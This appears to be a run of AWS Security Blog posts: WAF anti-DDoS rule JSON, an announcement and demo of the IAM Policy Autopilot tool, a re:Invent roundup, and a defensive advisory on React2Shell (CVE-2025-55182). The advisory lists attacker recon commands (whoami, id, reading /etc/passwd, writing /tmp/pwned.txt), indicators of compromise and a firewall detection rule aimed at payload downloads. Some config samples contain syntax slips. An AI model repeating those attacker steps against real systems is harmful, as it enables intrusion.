  2. A rate-limiting rule, scoped to sensitive URLs, configured with a 100 requests threshold over a 2-minute window
  3. A rate-limiting rule, scoped to sensitive URLs and to the event-detected label, configured with a 10 requests threshold over a 10-minute window

Configuration

After adding your Anti-DDoS AMR with default configuration, and your rate-limit rule for sensitive URLs, create a subsequent new rate limiting rule with the following JSON definition.

{
    "Action": {
        "Block": {}
    },
    "Name": "ip-rate-limit-10-10mins-under-ddos",
    "Priority": 2,
    "Statement": {
        "RateBasedStatement": {
            "AggregateKeyType": "IP",
            "EvaluationWindowSec": 600,
            "Limit": 10,
            "ScopeDownStatement": {
                "AndStatement": {
                    "Statements": [
                        {
                            "ByteMatchStatement": {
                                "FieldToMatch": {
                                    "UriPath": {}
                                },
                                "PositionalConstraint": "EXACTLY",
                                "SearchString": "/sensitive-url",
                                "TextTransformations": [
                                    {
                                        "Priority": 0,
                                        "Type": "LOWERCASE"
                                    }
                                ]
                            }
                        },
                        {
                            "LabelMatchStatement": {
                                "Key": "awswaf:managed:aws:anti-ddos:event-detected",
                                "Scope": "LABEL"
                            }
                        }
                    ]
                }
            }
        }
    },
    "VisibilityConfig": {
        "CloudWatchMetricsEnabled": true,
        "MetricName": "ip-rate-limit-10-10mins-under-ddos",
        "SampledRequestsEnabled": true
    }
}

Example 3: Adaptive response according to your application scalability

Suppose that you are operating a legacy application that can safely scale to a certain threshold of traffic volume, after which it degrades. If the total traffic volume, including the DDoS traffic, is below this threshold, you decide not to challenge all requests during a DDoS attack to avoid impacting user experience. In this scenario, you’d only rely on the default block action of high suspicion DDoS requests. If the total traffic volume is above the safe threshold of your legacy application to process traffic, then you decide to use the equivalent of Anti-DDoS AMR’s default ChallengeDDoSRequests mitigation. You can implement this using the following rules:

  1. An Anti-DDoS AMR with ChallengeAllDuringEvent and ChallengeDDoSRequests rules configured in count mode.
  2. A rate limiting rule that counts your traffic and is configured with a threshold corresponding to your application capacity to normally process traffic. As action, it only counts requests and applies a custom labelβ€”for example, CapacityExceededβ€”when its thresholds are met.
  3. A rule that mimics ChallengeDDoSRequests but only when the CapacityExceeded label is present: Challenge if ddos-request, CapacityExceeded, and challengeable-request labels are present

Configuration

First, update your Anti-DDoS AMR by changing Challenge actions to Count actions.

Figure 2 – Updated Anti-DDoS AMR rules in example 3

Figure 2 – Updated Anti-DDoS AMR rules in example 3

Then create the rate limit capacity-exceeded-detection rule in count mode, using the following JSON definition:

{
    "Action": {
        "Count": {}
    },
    "Name": "capacity-exceeded-detection",
    "Priority": 2,
    "RuleLabels": [
        {
            "Name": "mycompany:capacityexceeded"
        }
    ],
    "Statement": {
        "RateBasedStatement": {
            "Limit": 10000
            "AggregateKeyType": "CONSTANT",
            "EvaluationWindowSec": 120,
            "ScopeDownStatement": {
                "NotStatement": {
                    "Statement": {
                        "LabelMatchStatement": {
                            "Scope": "LABEL",
                            "Key": "non-exsiting-label-to-count-all-requests"
                        }
                    }
                }
            }
        }
    },
    "VisibilityConfig": {
        "CloudWatchMetricsEnabled": true,
        "MetricName": "capacity-exceeded-detection",
        "SampledRequestsEnabled": true
    }
}

Finally, create the challenge-if-ddos-and-capacity-exceeded challenge rule using the following JSON definition:

{
    "Action": {
        "Challenge": {}
    },
    "Name": "challenge-if-ddos-and-capacity-exceeded",
    "Priority": 3,
    "Statement": {
        "AndStatement": {
            "Statements": [
                {
                    "LabelMatchStatement": {
                        "Key": "mycompany:capacityexceeded",
                        "Scope": "LABEL"
                    }
                },
                {
                    "LabelMatchStatement": {
                        "Key": "awswaf:managed:aws:anti-ddos:ddos-request",
                        "Scope": "LABEL"
                    }
                },
                {
                    "LabelMatchStatement": {
                        "Key": "awswaf:managed:aws:anti-ddos:challengeable-request",
                        "Scope": "LABEL"
                    }
                }
            ]
        }
    },
    "VisibilityConfig": {
        "CloudWatchMetricsEnabled": true,
        "MetricName": "challenge-if-ddos-and-capacity-exceeded",
        "SampledRequestsEnabled": true
    }
}

Conclusion

By combining the built-in protections of the Anti-DDoS AMR with custom logic, you can adapt your defenses to match your unique risk profile, traffic patterns, and application scalability. The examples in this post illustrate how you can fine-tune sensitivity, enforce stronger mitigations under specific conditions, and even build adaptive defenses that respond dynamically to your system’s capacity.

You can use the dynamic labeling system in AWS WAF to implement customization granularly. You can also use AWS WAF labels to exclude costly logging of DDoS attack traffic.

If you have feedback about this post, submit comments in the Comments section below.

Achraf Souk

Achraf is a Principal Solutions Architect at AWS with more than 15 years of experience in cloud, security, and networking. He works closely with customers across industries to design resilient, fast, and secure web applications. A frequent writer and speaker, he enjoys simplifying deeply technical topics for a wider audience. Achraf has a track record in building and scaling technical organizations.

IAM Policy Autopilot: An open-source tool that brings IAM policy expertise to builders and AI coding assistants

9 December 2025 at 00:23

Today, we’re excited to announce IAM Policy Autopilot, an open-source static analysis tool that helps your AI coding assistants quickly create baseline AWS Identity and Access Management (IAM) policies that you can review and refine as your application evolves. IAM Policy Autopilot is available as a command-line tool and Model Context Protocol (MCP) server, and it analyzes application code locally to create identity-based policies to control access for application roles. By adopting IAM Policy Autopilot, builders focus on writing application code, accelerating development on Amazon Web Service (AWS) and saving time spent on writing IAM policies and troubleshooting access issues.

Builders developing on AWS want to accelerate development and deliver value faster to their businesses, and they are increasingly using AI coding assistants like Kiro, Claude Code, Cursor, and Cline to do so. There are three aspects related to IAM permissions where builders can use some help. First, builders might want to focus on developing applications instead of spending time understanding permissions, writing IAM policies, or troubleshooting permission-related errors. Second, AI coding assistants, while excelling at generating application code, struggle with the nuances of IAM and need tools to help them produce reliable policies that capture complex cross-service permission requirements. Third, both builders and their AI assistants need to stay current with the latest IAM requirements and integration approaches without going through AWS documentation manually, ideally through a single tool that stays up-to-date with IAM expertise.

IAM Policy Autopilot addresses these challenges in three ways. First, it performs deterministic code analysis of your application, generating the necessary identity-based IAM policies based on actual AWS SDK calls in your codebase. This speeds up the initial policy creation process and reduces troubleshooting time. Second, IAM Policy Autopilot provides AI coding assistants with accurate, reliable IAM configurations through the MCP, preventing AI hallucinations that often lead to policy errors and verifying that generated policies are syntactically correct and valid. Third, IAM Policy Autopilot stays current with the expanding AWS service catalog by regularly updating its expertise with new services, permissions, and integration patterns, so both builders and their AI assistants have access to current IAM requirements without manual research.

This post demonstrates IAM Policy Autopilot in action, showing how it analyzes your code to generate IAM identity-based policies during development. You’ll see how IAM Policy Autopilot seamlessly integrates with AI coding assistants to create the necessary baseline policies during deployment, and how builders can also use IAM Policy Autopilot directly through its command line interface (CLI) tool. We’ll also provide guidance on best practices and considerations for incorporating IAM Policy Autopilot into your development workflow. You can set up IAM Policy Autopilot by visiting the GitHub repository.

How IAM Policy Autopilot works

IAM Policy Autopilot analyzes application code and generates identity-based IAM policies based on AWS SDK calls in your application. During testing, if permissions are still missing, IAM Policy Autopilot detects these errors and adds the necessary policies to get you unblocked. IAM Policy Autopilot supports applications that are written in three languages: Python, Go, and Typescript.

Policy creation

The core capability of IAM Policy Autopilot is deterministic code analysis that generates IAM identity-based policies with consistent, reliable results. On top of SDK-to-IAM mappings, IAM Policy Autopilot understands complex dependency relationships across AWS services. To call s3.putObject(), IAM Policy Autopilot generates not only the Amazon Simple Storage Service (Amazon S3) permission (s3:PutObject) but also includes AWS Key Management Server (AWS KMS) permission (kms:GenerateDataKey) that might be required for encryption scenarios. IAM Policy Autopilot understands cross-service dependencies and common usage patterns, and intentionally adds these permissions related to the PutObject API in this initial pass, so that your application can function correctly regardless of encryption configuration from the first deployment.

Access denied troubleshooting

After permissions are created, if you still encounter Access Denied errors during testing, IAM Policy Autopilot detects these errors and provides instant troubleshooting. When enabled, the AI coding assistant invokes IAM Policy Autopilot to analyze the denial and propose targeted IAM policy fixes. After you review and approve the analysis and suggested changes, IAM Policy Autopilot updates the permissions.

MCP and CLI support

IAM Policy Autopilot operates in two modes to fit different development workflows. As an MCP server, it integrates with MCP-compatible coding assistants, including Kiro, Amazon Q Developer, Cursor, Cline, and Claude Code. You can also use IAM Policy Autopilot as a standalone CLI tool to generate policies directly or fix missing permissions. Both approaches provide the same policy creation and troubleshooting capabilities, so you can choose the integration that best fits your workflow.

Demonstrating IAM Policy Autopilot capabilities

This walkthrough demonstrates the MCP server capabilities of IAM Policy Autopilot through a practical example: creating a file upload application that stores documents in Amazon S3 with server-side encryption using a customer-managed KMS key. This demonstration uses Cline, though IAM Policy Autopilot works with MCP-compatible coding assistants.

Prerequisites and setup

You can install IAM Policy Autopilot using uv or pip. The simplest method is with uv by running uvx iam-policy-autopilot, and configure the MCP server in your MCP client configuration file as follows. Note that MCP configuration would be different if you install IAM Policy Autopilot using pip.

{
	"mcpServers": {
	  "iam-policy-autopilot": {
		"command": "uvx",
		"args': ["iam-policy-autopilot", "mcp-server"],
		"env": {
		   "AWS_PROFILE": "your-profile-name",
		   "AWS_REGION": "us-east-1"
		}
Β Β Β Β  	"disabled": false,
		"autoApprove": []
	  }
   }
}

Creating a secure file upload Lambda function

In this section, we walk you through creating an application from scratch. We demonstrate the interaction between the developer, Cline, and IAM Policy Autopilot to showcase how you provide guidance to Cline and how Cline invokes IAM Policy Autopilot behind the scenes to generate IAM policies and deploy your application.

1. The builder describes their requirements
User: I need to create a Lambda function for uploading files to S3. The files should be encrypted using a customer-managed KMS key. Can you help me build this?

2. Cline starts planning the solution
Cline: I’ll help you create a secure file upload Lambda function. Let me break this down:

  1. Create a Lambda function to handle file uploads
  2. Set up S3 integration with customer-managed KMS encryption
  3. Create the necessary IAM permissions
  4. Build the infrastructure using CDK
    Let me start by writing the Lambda function code.

3. Cline writes the AWS Lambda function code
Cline will also prompt for credential inputs required for deployment, such as partition, AWS Region, and AWS account ID.

Cline then creates the uploadHandler.js file:

const { S3Client, PutObjectCommand } = require('@aws-sdk/client-s3');

const s3Client = new S3Client({ region: 'us-west-2' });

exports.handler = async (event) => {
	const { fileName, fileContent } = JSON.parse(event.body);

	const putObjectParams = {
		Bucket: process.env.BUCKET_NAME,
		Key: fileName,
		Body: fileContent,
		ServerSideEncryption: 'aws:kms',
		SSEKMSKeyId: process.env.KMS_KEY_ID
	};

	try {
		await s3Client.send(new PutObjectCommand(putObjectParams));
		return {
			statusCode: 200,
			body: JSON.stringify({ message: 'File uploaded successfully' })
		};
	} catch (error) {
		return {
			statusCode: 500,
			body: JSON.stringify({ error: error.message })
		};
	}
};

4. Cline needs to create IAM policies and will discover IAM Policy Autopilot
Cline: Now I need to create the IAM role with the correct permissions for this Lambda function. Let me check what tools are available to help with IAM policy creation.

Cline discovers the IAM Policy Autopilot MCP server has policy creation capabilities and invokes it:

Request Type: CallToolRequest
	Method: CallToolRequestMethod
	Params:
		Name: "generate_application_policies"
		Arguments:
			account: "123456789012"
			partition: "aws"
			region: "us-west-2"
			source_files: [
				"/Users/user/workspace/uploadHandler.js"
			]
		Extensions: Extensions

5. IAM Policy Autopilot analyzes the code and generates the policy
IAM Policy Autopilot scans the code and identifies PutObjectCommand in the application code, which it recognizes to be an Amazon S3 API call. Based on typical usage patterns of AWS customers, IAM Policy Autopilot also suggests encryption permissions and CloudWatch log permissions.

IAM Policy Autopilot generates an IAM identity policy that includes permissions potentially needed for Amazon S3 PutObject, including AWS KMS permissions that might be required for encryption scenarios:

{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Effect": "Allow",
			"Action": [
				"s3:PutObject"
			],
			"Resource": "arn:aws:s3:::*/*"
		},
		{
			"Effect": "Allow",
			"Action": [
				"kms:Encrypt",
				"kms:GenerateDataKey"
			],
			"Resource": "arn:aws:kms:us-west-2:123456789012:key/*"
		},
		{
			"Effect": "Allow",
			"Action": [
				"logs:CreateLogGroup",
				"logs:CreateLogStream",
				"logs:PutLogEvents"
			],
			"Resource": "arn:aws:logs:us-west-2:123456789012:*"
		}
	]
}

6. Cline creates the complete CloudFormation infrastructure
Cline: Perfect! IAM Policy Autopilot generated comprehensive permissions for your Lambda function including S3 PutObject permissions, KMS permissions for potential encryption scenarios, and CloudWatch Logs permissions for function execution. I’ll now create the complete CloudFormation template.

Cline generates the AWS CloudFormation template with the permissions provided by IAM Policy Autopilot:

AWSTemplateFormatVersion: "2010-09-09"
Resources:
	UploadEncryptionKey:
		Type: AWS::KMS::Key
		Properties:
			KeyPolicy:
				Statement:
					Effect: Allow
					Principal:
						AWS: !Sub "arn:aws:iam::123456789012:root"
					Action: "kms:*"
					Resource: "*"

	SecureUploadBucket:
		Type: AWS::S3::Bucket

	UploadLambdaRole:
		Type: AWS::IAM::Role
		Properties:
			AssumeRolePolicyDocument:
				Version: "2012-10-17"
				Statement:
				Effect: Allow
				Principal:
					Service: lambda.amazonaws.com
				Action: sts:AssumeRole
			Policies:
			- PolicyName: UploadPolicy
				PolicyDocument:
					Version: "2012-10-17"
					Statement:
					- Effect: Allow
						Action:
						- s3:PutObject
						Resource: !Sub "${SecureUploadBucket}/*"
						- Effect: Allow
						Action:
						- kms:Encrypt
						- kms:GenerateDataKey
						Resource: !GetAtt UploadEncryptionKey.Arn
						- Effect: Allow
						Action:
							- logs:CreateLogGroup
							- logs:CreateLogStream
							- logs:PutLogEvents
						Resource: "arn:aws:logs:*:*:*"

	UploadHandler:
		Type: AWS::Lambda::Function
		Properties:
			Runtime: nodejs18.x
			Handler: uploadHandler.handler
			Code:
				ZipFile: |
					// Lambda function code would be deployed separately
			Role: !GetAtt UploadLambdaRole.Arn
			Environment:
				Variables:
					BUCKET_NAME: !Ref SecureUploadBucket
					KMS_KEY_ID: !Ref UploadEncryptionKey

This demonstrates how IAM Policy Autopilot seamlessly integrates into the development workflow, providing the coding assistant with current and accurate IAM configurations when invoked, while requiring minimum user intervention.

In this example, you’re passing a single file to IAM Policy Autopilot to analyze, but it can take in multiple files when conducting static code analysis and creating IAM policies.

Direct CLI use: Simplified policy creation

If you prefer direct command-line interaction, the CLI provides the same analysis capabilities without requiring an AI coding assistant.

1. Builder has existing code and needs policies
In this example, you have the same uploadHandler.js file and want to generate identity-based IAM policies for deployment:
$ iam-policy-autopilot generate-policy --region us-west-2 --account 123456789012 --pretty Users/user/workspace/uploadHandler.js

2. IAM Policy Autopilot analyzes and outputs the policy

{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Effect": "Allow",
			"Action": [
				"s3:PutObject"
			],
			"Resource": "arn:aws:s3:::*/*"
		},
		{
			"Effect": "Allow",
			"Action": [
				"kms:Encrypt",
				"kms:GenerateDataKey"
			],
			"Resource": "arn:aws:kms:us-west-2:123456789012:key/*"
		},
		{
			"Effect": "Allow",
			"Action": [
				"logs:CreateLogGroup",
				"logs:CreateLogStream",
				"logs:PutLogEvents"
			],
			"Resource": "arn:aws:logs:us-west-2:123456789012:*"
		}
	]
}

3. Builder uses the generated policy
You can now copy this policy directly into your CloudFormation template, AWS Cloud Development Kit (AWS CDK) stack, or Terraform configuration.

This CLI approach provides the same code analysis and cross-service permission detection as the MCP server but fits naturally into command-line workflows and automated deployment pipelines.

Best practices and considerations

When using IAM Policy Autopilot in your development workflow, following these practices will help you maximize its benefits while maintaining security best practices.

Start with IAM Policy Autopilot-generated policies, then refine

IAM Policy Autopilot generates policies that prioritize functionality over minimal permissions, helping your applications run successfully from the first deployment. These policies provide a starting point that you can refine as your application matures. Review the generated policies so that they align with your security requirements before deploying them.

Understand the IAM Policy Autopilot analysis scope

IAM Policy Autopilot excels at identifying direct AWS SDK calls in your code, providing comprehensive policy coverage for most development scenarios, but has some limitations to keep in mind. For example, if your code calls s3.getObject(bucketName) where bucketName is determined at runtime, IAM Policy Autopilot currently doesn’t predict which bucket will be accessed. For applications using third-party libraries that wrap AWS SDKs, you might need to supplement the analysis produced by IAM Policy Autopilot with manual policy review. Currently, IAM Policy Autopilot focuses on identity-based policies for IAM roles and users but does not create resource-based policies such as S3 bucket policies or KMS key policies.

Integrate with existing IAM workflows

IAM Policy Autopilot works best as part of a comprehensive IAM strategy. Use IAM Policy Autopilot to generate functional policies quickly, then use other AWS tools for ongoing refinement. For example, AWS IAM Access Analyzer can help identify unused permissions over time. This combination creates a workflow from rapid deployment to least-privilege optimization.

Understand the boundary between IAM Policy Autopilot and your coding assistant

IAM Policy Autopilot generates policies with specific actions based on deterministic analysis of your code. When you use the MCP server integration, your AI coding assistant receives this policy and might modify it when creating infrastructure-as-code templates. For example, you might see the assistant add specific resource Amazon Resource Names (ARNs) or include KMS key IDs based on additional context from your code. These changes come from your coding assistant’s interpretation of your broader code context, not from the static analysis provided by IAM Policy Autopilot. Always review content generated by your coding assistant before deployment to verify that it meets your security requirements.

Choose the right integration approach

Use the MCP server integration when working with AI coding assistants for seamless policy creation during development conversations. The CLI tool works well for batch processing or when you prefer direct command-line interaction. Both approaches provide the same analysis capabilities, so choose based on your development workflow preferences.

Conclusion

IAM Policy Autopilot transforms IAM policy management from a development challenge into an automated capability that works seamlessly within existing workflows. By using the deterministic code analysis and policy creation capabilities of IAM Policy Autopilot, builders can focus on creating applications knowing they have the necessary permissions to run successfully on AWS.

Whether you prefer working with AI coding assistants through the MCP server integration or using the direct CLI approach, IAM Policy Autopilot provides the same analysis capabilities. The tool identifies common cross-service dependencies such as S3 operations with AWS KMS encryption, generates syntactically correct policies, and stays current with the expanding catalog of services provided by AWS, reducing the burden on both builders and their AI assistants.

Rather than requiring builders to become IAM experts or struggle with cryptic permission errors, IAM Policy Autopilot makes AWS development more accessible and efficient. The result is faster deployment cycles, fewer permission-related failures, and more time spent on creating business value instead of debugging access issues.

Ready to reduce IAM friction in your development workflow? IAM Policy Autopilot is available now at no additional cost. Get started with IAM Policy Autopilot by downloading it from the GitHub repository and experience how automated policy creation can accelerate your AWS development. We welcome your feedback and contributions as we continue to expand the capabilities and coverage of IAM Policy Autopilot.

If you have feedback about this post, submit comments in the Comments section below.

Diana Yin

Diana Yin

Diana is a Senior Product Manager for AWS IAM Access Analyzer. Diana focuses on solving problems at the intersection of customer insights, product strategy, and technology. Outside of work, Diana paints natural landscapes in watercolor and enjoys water activities. She holds an MBA from the University of Michigan and a Master of Education from Harvard University.

Luke Kennedy

Luke Kennedy

Luke is a Principal Software Development Engineer with AWS Identity and Access Management (IAM). Luke joined the IAM organization in 2013 after graduating from Rose-Hulman Institute of Technology with a degree in Computer Science and Software Engineering. Outside of AWS, Luke enjoys spending time with his cats, overcomplicating his home lab and network, and pursuing all things pumpkin flavored.

AWS launches AI-enhanced security innovations at re:Invent 2025

8 December 2025 at 19:41

At re:Invent 2025, AWS unveiled its latest AI- and automation-enabled innovations to strengthen cloud security for customers to grow their business. Organizations are likely to increase security spending from
$213 billion in 2025 to $377 billion by 2028 as they adopt generative AI. This 77% increase highlights the importance organizations place on securing their AI investments as they expand their digital footprints.

AWS uses artificial intelligence, machine learning, and automation to help you secure your environments proactively. These advancements include AI security agents, machine-learning and automation-driven threat detection, and agent-centric identity and access management. Together, they unify defense-in-depth across the application, infrastructure, network, and data layers to protect organizations from a wide spectrum of threats, vulnerabilities, and misconfigurations that could disrupt business operations.

AI security agents

AWS is embedding AI agents directly into security workflows to perform code reviews, collate incident response signals, and secure agentic access.

  • AWS Security Agent is a frontier agent that proactively secures applications throughout the development lifecycle. It conducts automated security reviews tailored to organizational requirements and delivers context-aware penetration testing on demand. By continuously validating security from design to deployment, it helps prevent vulnerabilities early in development.
  • AWS Security Incident Response delivers agentic AI-powered investigation capabilities designed to help enhance and accelerate security event response and recovery.
  • AgentCore Identity now offers authentication that provides enhanced access controls for AI agents, which restricts their interactions to authorized services and data based on specific user permissions and attributes. Enabling granular boundaries for how AI agents interact with enterprise applications reduces the risk of unauthorized access or data exposure.

ML and automation-driven threat detection

Machine learning models and automation now accelerate threat detection across more AWS environments, surfacing otherwise hard to see correlations, such as for sophisticated multistage attacks, at scale. These latest advancements save time by automatically correlating signals into consolidated sequences.

Agent-centric identity and access management

Intelligent access controls are redefining how organizations manage identities and permissions. These controls automate policy generation and improve your zero trust maturity level, making it easier for you to use AWS services.

  • IAM policy autopilot helps AI coding assistants quickly create baseline IAM policies that teams can refine as the application evolves, so organizations can build faster.
  • Outbound identity Federation helps IAM customers to securely federate their AWS identities to external services, making it easy to authenticate AWS workloads with cloud providers, SaaS platforms, and self-hosted applications.
  • Private access sign-in routes 100% of console traffic through VPC endpoints instead of public internet, using intelligent routing to maintain security without compromising performance.
  • Login for AWS local development lets developers use their existing console credentials to programmatically access AWS.

Transforming security through AI

These AI and ML advancements transform security from reactive manual processes to proactive, scalable protection. You can use them to operationalize threat hunting and advance your security posture, even as you grow your digital real estate.

The confidence organizations place in cloud-native security validates this approach. The AWS-sponsored report of 2,800 IT and security decision makers and practitioners revealed that 81% agree that their primary cloud provider’s native security and compliance capabilities exceed what their team could deliver independently. Additionally, 56% responded that the public cloud was better positioned to deliver security as opposed to 37% that selected on-premises, and 51% believe the public cloud is better positioned to meet regulations versus 41% that responded on-premises.

Cloud is the foundation on which customers build their businesses, and AWS continues to deliver security innovations that reinforce that foundation.

If you have feedback about this post, submit comments in the Comments section below.

Lise Feng

Lise Feng

Lise is a Seattle-based PR Manager focused on AWS security services and customers. Outside of work, she enjoys cooking and watching most contact sports.

China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)

5 December 2025 at 01:18

December 29, 2025: The blog post was updated to add options for AWS Network Firewall.

December 12, 2025: The blog post was updated to clarify when customers need to update their ReactJS version.

Within hours of the public disclosure of CVE-2025-55182 (React2Shell) on December 3, 2025, Amazon threat intelligence teams observed active exploitation attempts by multiple China state-nexus threat groups, including Earth Lamia and Jackpot Panda. This critical vulnerability in React Server Components has a maximum Common Vulnerability Scoring System (CVSS) score of 10.0 and affects React versions 19.x and Next.js versions 15.x and 16.x when using App Router. While this vulnerability doesn’t affect AWS services, we are sharing this threat intelligence to help customers running React or Next.js applications in their own environments take immediate action.

China continues to be the most prolific source of state-sponsored cyber threat activity, with threat actors routinely operationalizing public exploits within hours or days of disclosure. Through monitoring in our AWS MadPot honeypot infrastructure, Amazon threat intelligence teams have identified both known groups and previously untracked threat clusters attempting to exploit CVE-2025-55182. AWS has deployed multiple layers of automated protection through Sonaris active defense, AWS WAF managed rules (AWSManagedRulesKnownBadInputsRuleSet version 1.24 or higher), and perimeter security controls. However, these protections aren’t substitutes for patching. Regardless of whether customers are using a fully managed AWS service, if customers are running an affected version of React or Next.js in their environments, they should update to the latest patched versions immediately. Customers running React or Next.js in their own environments (Amazon Elastic Compute Cloud (Amazon EC2), containers, and so on) must update vulnerable applications immediately.

Understanding CVE-2025-55182 (React2Shell)

Discovered by Lachlan Davidson and disclosed to the React Team on November 29, 2025, CVE-2025-55182 is an unsafe deserialization vulnerability in React Server Components. The vulnerability was named React2Shell by security researchers.

Key facts:

  • CVSS score: 10.0 (Maximum severity)
  • Attack vector: Unauthenticated remote code execution
  • Affected components: React Server components in React 19.x and Next.js 15.x/16.x with App Router
  • Critical detail: Applications are vulnerable even if they don’t explicitly use server functions, as long as they support React Server Components

The vulnerability was responsibly disclosed by Vercel to Meta and major cloud providers, including AWS, enabling coordinated patching and protection deployment prior to the public disclosure of the vulnerability.

Who is exploiting CVE-2025-55182?

Our analysis of exploitation attempts in AWS MadPot honeypot infrastructure has identified exploitation activity from IP addresses and infrastructure historically linked to known China state-nexus threat actors. Because of shared anonymization infrastructure among Chinese threat groups, definitive attribution is challenging:

  • Infrastructure associated with Earth Lamia: Earth Lamia is a China-nexus cyber threat actor known for exploiting web application vulnerabilities to target organizations across Latin America, the Middle East, and Southeast Asia. The group has historically targeted sectors across financial services, logistics, retail, IT companies, universities, and government organizations.
  • Infrastructure associated with Jackpot Panda: Jackpot Panda is a China-nexus cyber threat actor primarily targeting entities in East and Southeast Asia. The activity likely aligns to collection priorities pertaining to domestic security and corruption concerns.
  • Shared anonymization infrastructure: Large-scale anonymization networks have become a defining characteristic of Chinese cyber operations, enabling reconnaissance, exploitation, and command-and-control activities while obscuring attribution. These networks are used by multiple threat groups simultaneously, making it difficult to attribute specific activities to individual actors.

This is in addition to many other unattributed threat groups that share commonality with Chinese-nexus cyber threat activity. The majority of observed autonomous system numbers (ASNs) for unattributed activity are associated with Chinese infrastructure, further confirming that most exploitation activity originates from that region. The speed at which these groups operationalized public proof-of-concept (PoC) exploits underscores a critical reality: when PoCs hit the internet, sophisticated threat actors are quick to weaponize them.

Exploitation tools and techniques

Threat actors are using both automated scanning tools and individual PoC exploits. Some observed automated tools have capabilities to deter detection such as user agent randomization. These groups aren’t limiting their activities to CVE-2025-55182. Amazon threat intelligence teams observed them simultaneously exploiting other recent N-day vulnerabilities, including CVE-2025-1338. This demonstrates a systematic approach: threat actors monitor for new vulnerability disclosures, rapidly integrate public exploits into their scanning infrastructure, and conduct broad campaigns across multiple Common Vulnerabilities and Exposures (CVEs) simultaneously to maximize their chances of finding vulnerable targets.

The reality of public PoCs: Quantity over quality

A notable observation from our investigation is that many threat actors are attempting to use public PoCs that don’t actually work in real-world scenarios. The GitHub security community has identified multiple PoCs that demonstrate fundamental misunderstandings of the vulnerability:

  • Some of the example exploitable applications explicitly register dangerous modules (fs, child_process, vm) in the server manifest, which is something real applications should never do.
  • Several repositories contain code that would remain vulnerable even after patching to safe versions.

Despite the technical inadequacy of many public PoCs, threat actors are still attempting to use them. This demonstrates several important patterns:

  • Speed over accuracy: Threat actors prioritize rapid operationalization over thorough testing, attempting to exploit targets with any available tool.
  • Volume-based approach: By scanning broadly with multiple PoCs (even non-functional ones), actors hope to find the small percentage of vulnerable configurations.
  • Low barrier to entry: The availability of public exploits, even flawed ones, enables less sophisticated actors to participate in exploitation campaigns.
  • Noise generation: Failed exploitation attempts create significant noise in logs, potentially masking more sophisticated attacks.

Persistent and methodical attack patterns

Analysis of data from MadPot reveals the persistent nature of these exploitation attempts. In one notable example, an unattributed threat cluster associated with IP address 183[.]6.80.214 spent nearly an hour (from 2:30:17 AM to 3:22:48 AM UTC on December 4, 2025) systematically troubleshooting exploitation attempts:

  • 116 total requests across 52 minutes
  • Attempted multiple exploit payloads
  • Tried executing Linux commands (whoami, id)
  • Attempted file writes to /tmp/pwned.txt
  • Tried to read/etc/passwd

This behavior demonstrates that threat actors aren’t just running automated scans, but are actively debugging and refining their exploitation techniques against live targets.

How AWS helps protect customers

AWS deployed multiple layers of protection to help safeguard customers:

  • Sonaris Active Defense

    Our Sonaris threat intelligence system automatically detected and restricted malicious scanning attempts targeting this vulnerability. Sonaris analyzes over 200 billion events per minute and integrates threat intelligence from our MadPot honeypot network to identify and block exploitation attempts in real time.

  • MadPot Intelligence

    Our global honeypot system provided early detection of exploitation attempts, enabling rapid response and threat analysis.

  • AWS WAF Managed Rules

    The default version (1.24 or higher) of the AWS WAF AWSManagedRulesKnownBadInputsRuleSet now includes updated rules for CVE-2025-55182, providing automatic protection for customers using AWS WAF with managed rule sets.

  • AWS Network Firewall Rule Options

    Managed

    The Active Threat Defense managed rules for AWS Network Firewall are automatically updated with the latest threat intelligence from MadPot so customers can get proactive protection for their VPCs.

    Custom

    The following AWS Network Firewall custom L7 stateful rule blocks HTTP connections made directly to IP addresses on non-standard ports (any port other than 80). This pattern has been commonly observed by Amazon Threat Intelligence in post-exploitation scenarios where malware downloads additional payloads or establishes command-and-control communications by connecting directly to IP addresses rather than domain names, often on high-numbered ports to evade detection.

    While not necessarily specific to React2Shell, many React2Shell exploits include this behavior, which is usually anomalous in most production environments. You can choose to block and log these requests or simply alert on them so you can investigate systems that are triggering the rule to determine whether they have been affected.

    reject http $HOME_NET any -> any !80 (http.host; content:"."; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/"; msg:"Direct to IP HTTP on non-standard port (common post exploitation malware download technique)"; flow:to_server; sid:2025121801;)

  • Amazon Threat Intelligence

    Amazon threat intelligence teams are actively investigating CVE-2025-55182 exploitation attempts to protect AWS infrastructure. If we identify signs that your infrastructure has been compromised, we will notify you through AWS Support. However, application-layer vulnerabilities are difficult to detect comprehensively from network telemetry alone. Do not wait for notification from AWS.
    Important: These protections are not substitutes for patching. Customers running React or Next.js in their own environments (EC2, containers, etc.) must update vulnerable applications immediately.

Immediate recommended actions

  1. Update vulnerable React/Next.js applications. See the AWS Security Bulletin (https://aws.amazon.com/security/security-bulletins/AWS-2025-030/) for affected and patched versions.
  2. Deploy the custom AWS WAF rule as interim protection (rule provided in the security bulletin).
  3. Review application and web server logs for suspicious activity.
  4. Look for POST requests with next-action or rsc-action-id headers.
  5. Check for unexpected process execution or file modifications on application servers.

If you believe your application may have been compromised,Β open an AWS Support case immediately for assistance with incident response.
Note: Customers using managed AWS services are not affected and require no action.

Indicators of compromise

Network indicators

  • HTTP POST requests to application endpoints with next-action or rsc-action-id headers
  • Request bodies containing $@ patterns
  • Request bodies containing "status":"resolved_model" patterns

Host-based indicators

  • Unexpected execution of reconnaissance commands (whoami, id, uname)
  • Attempts to read /etc/passwd
  • Suspicious file writes to /tmp/ directory (for example, pwned.txt)
  • New processes spawned by Node.js/React application processes

Threat actor infrastructure

IP Address, Date of Activity, Attribution
206[.]237.3.150, 2025-12-04, Earth Lamia
45[.]77.33.136, 2025-12-04, Jackpot Panda
143[.]198.92.82, 2025-12-04, Anonymization Network
183[.]6.80.214, 2025-12-04, Unattributed threat cluster

Additional resources

If you have feedback about this post, submit comments in theΒ CommentsΒ section below. If you have questions about this post, contact AWS Support.

CJ Moses

CJ Moses

CJ Moses is the CISO of Amazon Integrated Security. In his role, CJ leads security engineering and operations across Amazon. His mission is to enable Amazon businesses by making the benefits of security the path of least resistance. CJ joined Amazon in December 2007, holding various roles including Consumer CISO, and most recently AWS CISO, before becoming CISO of Amazon Integrated Security September of 2023.

